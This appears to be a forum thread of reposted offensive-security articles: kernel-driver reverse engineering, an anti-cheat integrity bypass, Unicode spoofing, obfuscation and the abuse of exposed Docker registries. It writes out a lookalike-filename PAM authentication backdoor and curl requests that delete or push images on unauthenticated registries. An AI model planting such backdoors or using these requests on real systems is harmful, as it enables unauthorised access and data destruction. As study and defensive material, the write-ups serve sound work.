something. Here’s an oversimplified diagram of how IOCTLs are sent and processed: User mode application gets a handle on the symlink. User mode application uses DeviceIoControl() to send the required IOCTL and input/output buffers to the symlink. The symlink points to the driver’s device object and allows the driver to receive the user mode application’s packet (IRP) The driver sees that the packet came from DeviceIoControl() so it passes it to the defined internal function, MyCtlFunction(). The MyCtlFunction() maps the function code, 0x800, to the internal function SomeFunction(). SomeFunction() executes. The IRP is completed and the status is passed back to the user along with anything the driver has for the user in the output buffer supplied by the user mode application. Note: I didn’t talk about IRP completion, but just know that those can/will happen once SomeFunction() and will include the status code returned by the function and will mark the end of the action. Disassembling the Driver Now that we understand the key structures we’re going to be looking for, it’s time to start digging into the target driver. I’ll be showing how to do this in Ghidra as I’m more comfortable in it, but the exact same methodology works in IDA. Once we have the driver that we’d like to target downloaded on our analysis system, it’s time to start looking for the IRP handlers that will point us to the potentially interesting functions. The Setup Since Ghidra doesn’t include many of the symbols we need for analyzing drivers at the time of writing this post (although it once did 🤔), we’ll need to find a way to get those imported somehow. Thankfully, this process is relatively simple thanks to some great work done by 0x6d696368 (Mich). Ghidra supports datatypes in the Ghidra Data Type Archive (GDT) format, which are packed binary files containing symbols derived from the chosen headers, whether those be custom or Microsoft-supplied. There isn’t any great documentation about generating these and it does require some manual tinkering, but thankfully Mich took care of all of that for us. On their GitHub project is a precompiled GDT for Ntddk.h and Wdm.h, ntddk_64.gdt. Download that file on the system you’re going to run Ghidra on. To import and begin using the GDT file, open the driver you want to start analyzing, click the Down Arrow (▼) in the Data Type Manager and select “Open File Archive.” Then select the ntddk_64.gdt file you downloaded earlier and open it. In your Data Type Manager window, you’ll now have a new item, “ntddk_64.” Right-click on it and choose “Apply Function Data Types.” This will update the decompiler and you’ll see a change in many of the function signatures. Finding DriverEntry Now that’ we’ve got our datatypes sorted, we next need to identify the driver object. This is trivial to find as it is the first parameter in DriverEntry. First, open the driver in Ghidra and do the initial auto analysis. Under the Symbol Tree window, expand the Exports item and there will be a function called entry. Note: There may be a GsDriverEntry function in some cases that will look like a call to 2 unnamed functions. This is a result of the developer using the /GS compiler flags and sets up the stack cookies. One of the functions is the real driver entry, so check either for the longer of the 2. Finding the IRP Handlers The first thing we are going to need to look for are a series of offsets from the driver object. These are related to the attributes of the nt!_DRIVER_OBJECT structure. The one that we are most interested in is the MajorFunction table (+0x70). This becomes a lot easier with our newly-applied symbols. Since we know that the first parameter of DriverEntry is a pointer to a driver object, we can click the parameter in the decompiler and press CTRL+L to bring up the Data Type Chooser. Search for PDRIVER_OBJECT and click OK. This will change the type of the parameter to match its true type. Note: I like to change the name of the parameter to DriverObject to help me while walking the function.To do this yourself, click the parameter, press “L”, and type in the name you want to use. Now that we have the appropriate type, it’s time to start looking for the offset to the MajorFunction table. Sometimes you may see this right in the DriverEntry function, but other times you’ll see the driver object being passed as a parameter to another internal function. Start looking for occurrences of the DriverObject variable. This is really easy if you have a mouse. Just click the mouse wheel over the variable to highlight all instances of the variable in the decompiler. In the example I am working with, I don’t see references to offsets from the driver object, but I do see it being passed to another function. Jump into this function, FUN_00011060, and retype the first parameter to a PDRIVER_OBJECT since we know that’s what it DriverEntry shows as its only parameter. Then again start searching for references to offsets from the DriverObject variable. Here’s what we’re looking for: In vanilla Ghidra, we’d see these as less detailed offsets from the DriverObject but since we applied the NTDDK datatypes, its a lot cleaner. So now that we’ve found the offsets from DriverObject marking the MajorFunction table, what are at the indexes (0, 2, 0xe)? These offsets are defined in the WDM headers (wdm.h) and represent the IRP major function codes. In our example the driver handles 3 major function codes — IRP_MJ_CREATE, IRP_MJ_CLOSE, and IRP_MJ_DEVICE_CONTROL. The first 2 aren’t really of interest to us, but IRP_MJ_DEVICE_CONTROL is very important. This is because the function defined at that offset (0x104bc) is what processes requests made from usermode using DeviceIoControl and its included I/O Control Codes (IOCTLs). Let’s dig into this function. Double-click the offset for MajorFunction[0xe]. This will take you to the function at offset 0x104bc in the driver. The second parameter of this function, and all device I/O control IRP handlers, is a pointer to an IRP. We can again use the CTRL+L to retype the second parameter to PIRP (and optionally rename it). The IRP structure is incredibly complex and even with the help of our new type definitions, we still won’t be able to pinpoint everything. The first and most important thing we are going to want to look for is IOCTLs. These will be represented as DWORDs inside the decompiler, but we need to know which variable they’re assigned to. To figure that out, we’ll need to rely on our old friend WinDbg. The first offset from our IRP that we can see is IRP->Tail + 0x40. Let’s dig into the IRP structure a bit. We can see that Tail begins at offset +0x78but what is 0x40 bytes beyond that? Using WinDbg, we can see that CurrentStackLocation is at offset +0x40 from Irp->Tail, but it only shows as a pointer. Microsoft gives us a hint that this is a pointer to a _IO_STACK_LOCATION structure. So in our decompiler, we can rename lVar2 to CurrentStackLocation. Following this new variable, we want to find a reference to offset +0x18, which is the IOCTL. Rename this variable to something memorable if you’d like. Now that we’ve found the variable holding the IOCTL, we should be able to see it being compared to a whole bunch of DWORDs. These comparisons are the driver checking for the IOCTLs that it can handle. After each comparison will most likely be an internal function call. These are what will be executed when that specific IOCTL is sent to the driver from user mode! In the above example, when the driver receives IOCTL 0x8000204c, it will execute FUN_0000944c (some type of printing function) and FUN_000100d0. The Short Story That was a large amount of information, but in practice it is very simple. My workflow is: Follow the first parameter of DriverEntry, the driver object, until I find offsets indicating the MajorFunction table. Look for an offset at MajorFunction[0xe], marking the DeviceIoControl IRP handler. Follow the second parameter of this function, PIRP, until I find PIRP->Tail +0x40, marking the CurrentStackLocation. Find offset +0x18 from CurrentStackLocation, which will be the IOCTLs In a lot of cases, I will just skip steps 3 and 4 and just look through the decompiler for a long chain of DWORD comparisons. If I’m really feeling lazy, I’ll look for calls to IofCompleteRequest and just scroll up from the calls looking for the DWORD comparisons 🤐 Function Reversing Now that we know which functions will execute internally when the driver receives an IOCTL, we can begin reversing those functions to find interesting functionalities. Because this differs so much between drivers, there’s no real sense in covering this process (there’s also books written about this stuff). My typical workflow at this point is to look for interesting API calls inside of these functions, determine what they require for input, and then use a simple user mode client (I use a generic template that I copy and modify depending on the target) to send the IRPs. When analyzing EDR drivers, I also like to look through the capabilities they’ve baked in, such as process object handler callbacks. There are some great driver bug walkthroughs that can help spark some ideas (this is one of my favorites). The one important thing of note, especially when working with Ghidra, is this variable declaration: If you were to look at this in WinDbg, you’d see that at this offset is a pointer to MasterIrp. What you’re actually seeing is a union with IRP->SystemBuffer and this variable is actually the METHOD_BUFFERED data structure. This is why you’ll see this often times being passed into internal functions as parameters. Make sure to treat this as an input/output buffer while reversing internal functions. Good luck and happy hunting 😈 Posts By SpecterOps Team Members Posts from SpecterOps team members on various topics… Follow Thanks to Andy Robbins. Sursa: https://posts.specterops.io/methodology-for-static-reverse-engineering-of-windows-kernel-drivers-3115b2efed83
-
Come to our talk and find out, what state-of-the-art fuzzing technologies have to offer, and what is yet to come. This talk will feature demos, CVEs, and a release, as well as lots of stuff we learned over the last four years of fuzzing research. By Cornelius Aschermann and Sergej Schumilo Full Abstract & Presentation Materials: https://www.blackhat.com/eu-19/briefi...
-
FinDOM-XSS FinDOM-XSS is a tool that allows you to finding for possible and/ potential DOM based XSS vulnerability in a fast manner. Installation $ git clone git@github.com:dwisiswant0/findom-xss.git Dependencies: LinkFinder Configuration Change the value of LINKFINDER variable (on line 3) with your main LinkFinder file. Usage To run the tool on a target, just use the following command. $ ./findom-xss.sh https://target.host/about-us.html This will run the tool against target.host. Or if you have a list of targets you want to scan. $ cat urls.txt | xargs -I % ./findom-xss.sh % The second argument can be used to specify an output file. $ ./findom-xss.sh https://target.host/about-us.html /path/to/output.txt By default, output will be stored in the results/ directory in the repository with target.host.txt name. License FinDOM-XSS is licensed under the Apache. Take a look at the LICENSE for more information. Thanks @dark_warlord14 - Inspired by the JSScanner tool, that's why this tool was made. @aslanewre - With possible patterns. Sursa: https://github.com/dwisiswant0/findom-xss
-
Apr 8, 2020 :: iPower :: [ easy-anti-cheat, anti-cheats, game-hacking ] CVEAC-2020: Bypassing EasyAntiCheat integrity checks Introduction Cheat developers have specific interest in anti-cheat self-integrity checks. If you can circumvent them, you can effectively patch out or “hook” any anti-cheat code that could lead to a kick or even a ban. In EasyAntiCheat’s case, they use a kernel-mode driver which contains some interesting detection routines. We are going to examine how their integrity checks work and how to circumvent them, effectively allowing us to disable the anti-cheat. Reversing process [1] EPT stands for Extended Page Tables. It is a technology from Intel for MMU virtualization support. Check out Daax’s hypervisor development series if you want to learn more about virtualization. The first thing to do is actually determine if there is any sort of integrity check. The easiest way is to patch any byte from .text and see if the anti-cheat decides to kick or ban you after some time. About 10-40 seconds after I patched a random function, I was kicked, revealing that they are indeed doing integrity checks in their kernel module. With the assistance of my hypervisor-based debugger, which makes use of EPT facilities [1], I set a memory breakpoint on a function that was called by their LoadImage notify routine (see PsSetLoadImageNotifyRoutine). After some time, I could find where they were accessing memory. After examining xrefs in IDA Pro and setting some instruction breakpoints, I discovered where the integrity check function gets called from, one of them being inside the CreateProcess notify routine (see PsSetCreateProcessNotifyRoutine). This routine takes care of some parts of the anti-cheat initialization, such as creating internal structures that will be used to represent the game process. EAC won’t initialize if it finds out that their kernel module has been tampered with. The integrity check function itself is obfuscated, mainly containing junk instructions, which makes analyzing it very annoying. Here’s an example of obfuscated code: mov [rsp+arg_8], rbx ror r9w, 2 lea r9, ds:588F66C5h[rdx*4] sar r9d, cl bts r9, 1Fh mov [rsp+arg_10], rbp lea r9, ds:0FFFFFFFFC17008A9h[rsi*2] sbb r9d, 2003FCE1h shrd r9w, cx, cl shl r9w, cl mov [rsp+arg_18], rsi cmc mov r9, cs:EasyAntiCheatBase With the assist of Capstone, a public disassembly framework, I wrote a simple tool that disassembles every instruction from a block of code and keeps track of register modifications. After that, it finds out which instructions are useless based on register usage and remove them. Example of output: mov [rsp+arg_8], rbx mov [rsp+arg_10], rbp mov [rsp+arg_18], rsi mov r9, cs:EasyAntiCheatBase Time to reverse this guy! The integrity check function This is the C++ code for the integrity check function: bool check_driver_integrity() { if ( !peac_base || !eac_size || !peac_driver_copy_base || !peac_copy_nt_headers ) return false; bool not_modified = true; const auto num_sections = peac_copy_nt_headers->FileHeader.NumberOfSections; const auto* psection_headers = IMAGE_FIRST_SECTION( peac_copy_nt_headers ); // Loop through all sections from EasyAntiCheat.sys for ( WORD i = 0; i < num_sections; ++i ) { const auto characteristics = psection_headers[ i ].Characteristics; // Ignore paged sections if ( psection_headers[ i ].SizeOfRawData != 0 && READABLE_NOT_PAGED_SECTION( characteristics ) ) { // Skip .rdata and writable sections if ( !WRITABLE_SECTION( characteristics ) && ( *reinterpret_cast< ULONG* >( psection_headers[ i ].Name ) != 'adr.' ) ) { auto psection = reinterpret_cast< const void* >( peac_base + psection_headers[ i ].VirtualAddress ); auto psection_copy = reinterpret_cast< const void* >( peac_driver_copy_base + psection_headers[ i ].VirtualAddress ); const auto virtual_size = psection_headers[ i ].VirtualSize & 0xFFFFFFF0; // Compare the original section with its copy if ( memcmp( psection, psection_copy, virtual_size ) != 0 ) { // Uh oh not_modified = false; break; } } } } return not_modified; } As you can see, EAC allocates a pool and makes a copy of itself (you can check that by yourself) that will be used in their integrity check. It compares the bytes from EAC.sys with its copy and see if both match. It returns false if the module was patched. The work-around Since the integrity check function is obfuscated, it would be pretty annoying to find it because it is subject to change between releases. Wanting the bypass to be simple, I began brainstorming some alternative solutions. The .pdata section contains an array of function table entries, which are required for exception handling purposes. As the semantics of the function itself is unlikely to change, we can take advantage of this information! In order to make the solution cleaner, we need to patch EasyAntiCheat.sys and its copy to disable the integrity checks. To find the pool containing the copy, we can use the undocumented API ZwQuerySystemInformation and pass SystemBigPoolInformation (0x42) as the first argument. When the call is successful, it returns a SYSTEM_BIGPOOL_INFORMATION structure, which contains an array of SYSTEM_BIGPOOL_ENTRY structures and the number of elements returned in that array. The SYSTEM_BIGPOOL_ENTRY structure contains information about the pool itself, like its pooltag, base and size. Using this information, we can find the pool that was allocated by EAC and modify its contents, granting us the unhindered ability to patch any EAC code without triggering integrity violations. Proof of Concept PoC code is released here It contains the bypass for the integrity check and a patch to a function that’s called by their pre-operation callbacks, registered by ObRegisterCallbacks, letting you create handles to the target process. I’m aware that this is by no means an ideal solution because you’d need to take care of other things, like handle enumeration, but I’ll leave this as an exercise for the reader. You are free to improve this example to suit your needs. The tests were made on four different games: Rust, Apex Legends, Ironsight and Cuisine Royale. Have fun! See you in the next article! Sursa: https://secret.club/2020/04/08/eac_integrity_check_bypass.html
-
Hacking The Web With Unicode Confuse, Spoof and Make Backdoors. Vickie Li Apr 12 · 4 min read Unicode was developed to represent all of the world’s languages on the computer. Early in the history of computers, characters were encoded by assigning a number to each one. This encoding system was not adequate since it did not cover many languages besides English, and it was impossible to type the majority of languages in the world. Then the Unicode standard emerged. The Unicode standard consists of a set of code charts for a visual reference of what the character looks like and a corresponding “code” for each unique character. See the chart above! And now, the world’s languages can be typed and transmitted easily using the computer! Visual Spoofing However, the adoption of Unicode has also introduced a whole host of attack vectors onto the Internet. And today, let’s talk about some of these issues! Unicode phishing One of the main issues is that some characters of different languages look identical or are very similar to each other. A Α А ᗅ ᗋ ᴀ A These characters all look alike, but they all have a different encoding under the Unicode system. Therefore, they are all completely different as far as the computer is concerned. Attackers can exploit this during a phishing attack because users put a lot of trust in domain names. When you see a trusted domain name, like “google.com” in your URL bar, you immediately trust the website that you are visiting. Attackers can take advantage of this trust by registering a domain name that looks like the trusted one, for example, “goōgle.com”. In this case, victims can easily overlook the additional marking on the “o”, trust that they are indeed on Google’s website, and provide the fraudulent site their Google credentials. Spoofing domain names this way can also help attackers lure victims to their site. For example, attackers can post a link “images.goōgle.com/puppies” on a social media site. She gets her victims to think that the link redirects to a puppy photo on Google when it really redirects to a page that auto-downloads malware. Bypassing word filters Unicode can also be used to bypass profanity filters. When an email list or forum uses profanity filters and prevents users from using profanities like “*sshole”, the filter can be easily bypassed by using lookalike Unicode characters, like “*sshōle”. Spoofing file extensions Another interesting exploit utilizes the Unicode character (U+202E), which is the “right-to-left override” character. This character visually reverses the direction of the text that comes after the character. For example, the string “harmless(U+202E)txt.exe” will appear on the screen as “harmlessexe.txt”. This can cause users to believe that the file is a harmless text file, while they are actually downloading and opening an executable file. Unicode Backdoors Just what else could be done using the visual spoofing capabilities of Unicode? Quite a lot, as it turns out! Unicode can also be used to hide backdoors in scripts. Let’s look at how attackers can use Unicode to make their manipulations of files (nearly) undetectable! There is a script in Linux systems that handles authentication: /etc/pam.d/common-auth. And the file contains these lines: [...] auth [success=1 default=ignore] pam_unix.so nullok_secure # here's the fallback if no module succeeds auth requisite pam_deny.so [...] auth required pam_permit.so [...] The script first checks the user’s password. Then if the password check fails, pam_deny.so is executed, making the authentication fail. Otherwise, pam_permit.so is executed, and the authentication will succeed. So what can an attacker do if she gains temporary access to the system? First, she can copy the contents of pam_permit.so to a new file, “pam_deոy.so”, whose filename looks like pam_deny.so visually. cp /lib/*/security/pam_permit.so /lib/security/pam_deոy.so Then, she can modify /etc/pam.d/common-auth to use the newly created “pam_deոy.so” should the password checking fail: [...] auth [success=1 default=ignore] pam_unix.so nullok_secure # here's the fallback if no module succeeds auth requisite pam_deոy.so [...] auth required pam_permit.so [...] Now, authentication will succeed regardless of the result of the password check, since both “pam_permit.so” and “pam_deոy.so” contain the script that makes authentication succeed. And since “n” and “ո” lookalike in many terminal fonts, /etc/pam.d/common-auth will look very much like the original when viewed with cat, less or a text editor. Furthermore, the contents of the original pam_deny.so was not modified at all, and still contains the code that makes authentication fail. This backdoor is therefore extremely difficult to detect even if the system administrator carefully inspects the contents of both /etc/pam.d/common-auth and pam_deny.so. Tools Here is a tool that you can use to test out some these Unicode attacks: Homoglyph Attack Generator Homoglyph Attack Generator and Punycode Converter This app is meant to make it easier to generate homographs based on… www.irongeek.com One way that you can protect yourself against Unicode attacks is to make sure that you scan any text string that looks suspect with a Unicode detector. For example, you can use these tools to detect Unicode: Unicode Character Detector With this simple tool, you can instantly identify GSM characters and Unicode symbols in your text messages. Characters… www.textmagic.com Unicode Lookup Unicode Lookup is an online reference tool to lookup Unicode and HTML special characters, by name and number, and… unicodelookup.com Conclusion Unicode has introduced many new attack vectors onto the Internet. Fortunately, most websites and applications are now noticing the dangers that Unicode characters pose, and are taking action against these attacks! Some applications prevent users from using certain character sets, while others display odd Unicode characters in the form of a question mark “�” or a block character “□”. Is your application protected against Unicode attacks? Thanks for reading. Follow me on Twitter for more posts like this one. Sursa: https://medium.com/swlh/hacking-the-web-with-unicode-73d0f0c97aab
-
Ebfuscation: Abusing system errors for binary obfuscation Introduction In this post I'm going to try to explain a new obfuscation technique I've come up with (at least I have not seen it before, please if there is documentation about this I would be grateful to receive it :D). First of all clarify that I am not an expert in obfuscation techniques and that some terms I use may not be correctly used. Software obfuscation is related both to computer security and cryptography. Obfuscation is closely related to steganography, a branch of cryptography that studies how to transfer secrets stealthily. Obfuscation does not guarantee the protection of your secret forever, as does encryption, where you need a key to be able to discover the secret. What obfuscation allows you is to make it more difficult to access your secret, and to gain the time necessary to benefit from your secret. There are many applications of obfuscation, both for people who are dedicated to doing good and for people who are dedicated to doing evil. In the case of video games, it allows you not to hack the game during the first weeks after its release (where video game companies get the maximum of their earnings). In the case of malware, it increases the time it takes for a reverse engineer to understand the behavior of the malware, which means that it can infect more computers until protection measures can be developed for that malware. Basically, an obfuscator receives a program as input, applies a series of transformations to it, and returns another program that has the same functionality as the input program. Here are other transformations that can be applied: - Virtualization - Control Flow Flattening - Encode literals - Opaque predicates - Encode Arithmetic ... This technique doesn't pretend to be the best of all obfuscation techniques, it's just a fun way I've come up with to obfuscate data. What is Ebfuscation? Ebfuscation, is a technique which can be used to implement different transformations such as Literals encoding, Control Flow Flattening and Virtualization. This technique is based on System's errors. To understand what "based on System's errors" means lets see an example. The following example is based on Encode literals transformation. (At the end of this post there is a Proof of Concept, where I implemented an obfuscator, for C programs, using Ebfuscation technique for strings.): Given the following C program int check_input(void) { char input[101] = { 0 }; char * passwd = "password123"; printf("Enter a password: "); fgets(input, 50, stdin); if (strncmp(input, passwd, strnlen(passwd, 11)) == 0) { return 1; } return 0; } int main(int argc, char *argv[]) { if (check_input() == 1) { char * valid_pass = "Well done!"; printf("%s\n", valid_pass); } else { char * invalid_pass = "Try again!"; printf("%s\n", invalid_pass); } return 0; } We want to protect the literal stored in variable passwd ("password123"). To do this, we take each character as byte. And we are going to generate the needed code to generate an error in the systems which corresponds to that byte. Lets see an example for the character "p" from "password123". "p" -> 112 -> generate_error_112() The function generate_error_112() is an abstraction since depend on to which system you want to generate the system error 112 the implementation of this function is different. For example to generate the system error code 3. On Linux /* 0x03 == ESRCH == No such process */ void generate_error_3() { kill(-9999, 0); } On Windows /* 0x03 == ERROR_PATH_NOT_FOUND */ void generate_error_3(void) { CreateFile( "C:\\Non\\Existent\\Directory\\By\\D00RT", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL ); } Then, the previous program after applying the transformation is equivalent to the following program: int check_input(void) { char input[101] = { 0 }; char * passwd[11]; generate_error_112(); /*p*/ passwd[0] = get_last_error(); generate_error_97(); /*a*/ passwd[1] = get_last_error(); generate_error_115(); /*s*/ passwd[2] = get_last_error(); generate_error_115(); /*s*/ passwd[3] = get_last_error(); generate_error_119(); /*w*/ passwd[4] = get_last_error(); generate_error_111(); /*o*/ passwd[5] = get_last_error(); generate_error_114(); /*r*/ passwd[6] = get_last_error(); generate_error_100(); /*d*/ passwd[7] = get_last_error(); generate_error_49(); /*1*/ passwd[8] = get_last_error(); generate_error_50(); /*2*/ passwd[9] = get_last_error(); generate_error_51(); /*3*/ passwd[10] = get_last_error(); passwd[11] = 0; printf("Enter a password: "); fgets(input, 50, stdin); if (strncmp(input, passwd, strnlen(passwd, 11)) == 0) { return 1; } return 0; } int main(int argc, char *argv[]) { if (check_input() == 1) { char * valid_pass = "Well done!"; printf("%s\n", valid_pass); } else { char * invalid_pass = "Try again!"; printf("%s\n", invalid_pass); } return 0; } NOTE: get_last_error function is also dependent to the System, in Windows to retrieve the last occurred error on the system the function GetLastError() is used, instead in linux you can use the global variable errno to retrieve the last error. Following sections will cover some deeper aspects of this technique such as pros&cons, the basic engine to produce the transformation... History This idea came up 2-3 years ago, when I started programming with C for windows systems. As in all the beginnings, I kept getting errors at the time of calling to Window's API functions. At that time I was also analyzing malware families that obscured their strings then I thought it could be a good idea to be able to hide my strings using the system errors that were producing my shitty code. The idea of being able to create something meaningful out of a series of mistakes fascinated me. This meant something profound to me, as it is a metaphor for my life, in which after many mistakes I finally get things to work the way I want them to. And it somehow represents all those people who have been rejected for not having the right knowledge, at the right time, but who struggle every day to improve and achieve their dreams. The art of turning mistakes into success. Although the idea came up years ago, until recently I didn't start to implement it since I didn't know very well how to start, but finally after some months thinking about how to do it, informing myself, learning and reading, I think I've found the way to make it as clear as possible. I have a draft of the obfuscator written in Python, but taking advantage of the quarantine I have decided to rewrite it in rust-lang, to reinforce the little knowledge I have about this language How does it work? Here is explained briefly how a minimal ebfuscator engine looks like. Analyzer: The analyzer is going to analyze the code of the provided program, in order to find these parts of the code you want to obfuscate. In the case of literals (The one I have implemented and I provide the tool on my github) the analyzer looks for literal strings on the source code in order to convert each byte into errors. Error tokenizer: This part is the key. It receives a byte as parameter. Its task is simple, it need to transform that byte into its corresponded system error, based on available system errors for the target platform. In the best scenario, we should be capable to map all the possible values of a byte to a system error. byte 0 -> generate_error_0() byte 1 -> generate_error_1() byte 2 -> generate_error_2() .. byte 253 -> generate_error_253() byte 254 -> generate_error_254() But this is not always possible. For example in Linux there are only 131 system errors. From 1 to 131... so in case we are capable of generate each error (which is not possible due some limitations like the hardware), how are you gonna get the value 200 if we can't generate that error? easy... combining errors. For example you can add 2 values. If you know how to generate error 100 what you can do is: generate_error_100(); int aux_1 = get_last_error(); generate_error_100(); int aux_2 = get_last_error(); int value_200 = aux_1 + aux2; or you can also do the following: generate_error_100(); int aux = get_last_error(); int value_200 = aux * 2 So here depends on the strategy you implement based on the available errors for the target platform. And at least for me it was the most challenging part. There are also other limitations for example some errors are too difficult to obtain, or you have to put on risk the system where you are executing the obfuscated program or there are some errors which are not dependent to our program. For example ERROR_NO_POOL_SPACE on windows which is the error number 62 and means "Space to store the file waiting to be printed is not available on the server.". I can't imagine how to generate this error. So yeah... now to generate an error is an art. In future posts I'll explain how I implemented my Error tokenizer which allows you to get an ebfuscator only with a few error codes implemented. Ofcourse there are many ways to implement it and probably all of them are better than the one I did. Pros & Cons This obfuscation was created for fun, here some of the pros and cons I have found. Probably there are more in both sides. Pros - The encoded secret is never stored into de binary, since value is maskared by the operating system. - It's almost impossible to deobfuscated statically since the errors are dependent to the system and to the computer where the obfuscated program is executed. This means that you can customize the errors to an specific characteristics of a system, like username, processors numbers, folder names, installed programs... - It creates a lot of code which is too boring for an analyst to analyze it and can realentize much time the reverse engineering process. - It can break the graph view of some debuggers such as IDA Pro, which shows the message "Sorry, this node is too big to display" (This error is not due the obfuscation itself, is more related to how the error tokenizer is implemented which add much overhead which cause this kind of error/warning). - It can break the decompiler feature for some decompilers such as the one used by IDA which shows the message "Decompilation failure: call analysis failed" (This error is not due the obfuscation itself, is more related to how the error tokenizer is implemented which add much overhead which cause this kind of error/warning). Cons - It produces a lot of overhead. Per each byte to obfuscate it add at least 1 function which can contain many instructions and system api calls. - You have to implement the code to generate the errors for each platform you want to support. - The dependence on systems errors. This means, if someday somehow the definition of these errors changes on the system you will need to update them. - Easy to detect the technique using heuristics. Proof of Concept - Strings literals ebfuscator I have implemented the first proof of concet which use this technique and is available on my github,. I called it Ebfuscator. I was written in rust lang and by the moment I only published the compiled binary of ebfuscator which allows you to obfuscate strings literals for a given C program. It supports both, windows and linux platforms. There are not many errors implemented so you can add more easily. You only need to define the function in {ebfuscator_folder}/errors/{platform}/errors.c and declare it into the file {ebfuscator_folder}/errors/{platform}/errors.h. Automatically ebfuscator will use that error too in order to obfuscate the bytes. For more information about the tool please read the README file in the repository. On this example I will obfuscate it for linux. So the command line is the following ./ebfuscator --platform linux --source ./examples/crackme_test.c -V passwd This command takes the program crackme_test.c and obfuscates the variable passwd using this technique. The output for this command is the following: ./output directory is created where you can find the obfuscated charckme_test.c, errors.c and errors.h files which are needed to compile the program. Compiling the program gcc -o target.bin ./output/ebfuscated.c ./output/errors.c -lm Now you can see how the program runs as expected The following images shows the before and after of both original code compiled and obfuscated code compiled in IDA Pro. In the above image you can see how the basic block increase its size a lot. From 18 lines to 381. Now the password doesn't appear on the binary and is masked behind the system errors. Please feel free to do Pull Request whit new errors Finally, I would like to encourage people to implement other transformations such as flow flattening control using this technique. Sursa: https://www.d00rt.eus/2020/04/ebfuscation-abusing-system-errors-for.html
-
Given the current worldwide pandemic and government sanctioned lock-downs, working from home has become the norm …for now. Thanks to this, Zoom, “the leader in modern enterprise video communications” is well on it’s way to becoming a household verb, and as a result, its stock price has soared! 📈 However if you value either your (cyber) security or privacy, you may want to think twice about using (the macOS version of) the app. In this blog post, we’ll start by briefly looking at recent security and privacy flaws that affected Zoom. Following this, we’ll transition into discussing several new security issues that affect the latest version of Zoom’s macOS client. Patrick Wardle (Principal Security Researcher @ Jamf) Patrick Wardle is a Principal Security Researcher at Jamf and founder of Objective-See. Having worked at NASA and the NSA, as well as presented at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Patrick is passionate about all things related to macOS security and thus spends his days finding Apple 0days, analyzing macOS malware and writing free open-source security tools to protect Mac users.
-
Sandboxie Sandboxie is sandbox-based isolation software for 32- and 64-bit Windows NT-based operating systems. It was developed by Sophos (which acquired it from Invincea, which acquired it earlier from the original author Ronen Tzur). It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying the local or mapped drive. An isolated virtual environment allows controlled testing of untrusted programs and web surfing. History Sandboxie was initially released in 2004 as a tool for sandboxing Internet Explorer. Over time, the program was expanded to support other browsers and arbitrary Win32 applications. In December 2013, Invincea announced the acquisition of Sandboxie. In February 2017, Sophos announced the acquisition of Invincea. Invincea posted an assurance in Sandboxie's website that for the time being Sandboxie's development and support would continue as normal. In September 2019, Sophos switched to a new license. In 2020 Sophos has released Sandboxie as Open Source under the GPLv3 licence to the community for further developement and maintanance. Sursa: https://github.com/sandboxie-dev/Sandboxie
-
Docker Registries and their secrets Avinash Jain (@logicbomb_1) Apr 9 · 4 min read Never leave your docker registry publicly exposed! Recently, I have been exploring dockers a lot in search of misconfigurations that organizations inadvertently make and end up exposing critical services to the internet. In continuation of my last blog where I talked about how a misconfiguration of leaving a docker host/docker APIs public can leak critical assets, here I’ll be emphasizing on how shodan led me to dozens of “misconfigured” docker registries and how I penetrated one of them. Refining Shodan Search I tried a couple of search filters to find out publicly exposed docker registry on shodan - port:5001 200 OK port:5000 docker 200 OK As docker registry by default runs on port 5000 (HTTP) or 5001(HTTPS) but this ends up giving more false positives as it is not necessary that people run docker only on port 5000/5001 and also “docker” keyword might occur anywhere - Docker keyword in HTTP response So in order to find any unique value in the docker registry which could help me in giving exact number of exposed docker registries, I set up my own docker registry (very nice documentation of setting up your own docker registry can be found in docker official site — here). I found that every API response of the Docker registry contains “Docker-Distribution-API-Version” header in it. Docker-Distribution-API-Version Header So my shodan search modified to Docker-Distribution-Api-Version 200 OK. 200 OK was intentionally put to only find unauthenticated docker registries (although this also has some false positives as many authentication mechanisms can still give you 200 status code). Shodan shows around 140+ docker registries were publicaly exposed that don’t have any kind of authentication on it. Penetrating Docker Registry Now next job was to penetrate and explore one of the publicly exposed docker registries. What came to great help for me was again the excellent documentation put by docker on their official website — here. 1/ API VERSION CHECK Making a curl request to the following endpoint and checking the status code provides the second level of confirmation whether docker registry can be accessed. Quoting from the official documentation of docker- “If a 200 OK response is returned, the registry implements the V2(.1) registry API and the client may proceed safely with other V2 operations”. curl -X GET http://registry-ip:port/v2/ 2/ REPOSITORY LIST Now the next task was to list the repositories present in the docker registry for which the following endpoint is used — curl -X GET http://registry-ip:port/v2/_catalog Listing repositories The following endpoint provided the list of tags for a specific repository — GET /v2/<repo-name>/tags/list 3/ DELETE REPOSITORY To delete a particular repository, you need the repository name and its reference. Here reference refers to the digest of the image. A delete may be issued with the following request format: DELETE /v2/<name>/manifests/<reference> To list the digests of a specific repository of a specific tag,(/v2/<name>/manifests/<tag>) — Listing digest If 202 Accepted status code is received that means the image has been successfully deleted. 4/ PUSHING AN IMAGE Same here if the push operation is allowed, status code 202 will be received. The following endpoint is used — POST /v2/<name>/blobs/uploads/ Conclusion Shodan shows around 140+ docker registries that are publicly exposed that don’t have any kind of authentication on it. The later part of the blog shows how easy it is to penetrate into a docker registry and exploit it. In all, the learning is to never expose your docker registry over the public. By default, it doesn’t have any authentication. Since docker registries don’t have a default authentication mechanism at least a basic auth could thwart some potential attacks. This can be mitigated by setting or enforcing basic auth over it and keeping the docker registry under VPN and preventing it from outside access. https://docs.docker.com/registry/deploying/#native-basic-auth For any organization which is heavily using containers for running application and services and for organizations which are moving towards a containerized platform, should understand and evaluate the security risks around them majorly the misconfiguration present in docker. Proper security controls, audits, and reviewing configuration settings need to be carried out on a periodic basis. Thanks for reading! ~Logicbomb ( https://twitter.com/logicbomb_1 ) Sursa: https://medium.com/@logicbomb_1/docker-registries-and-their-secrets-47147106e09
-
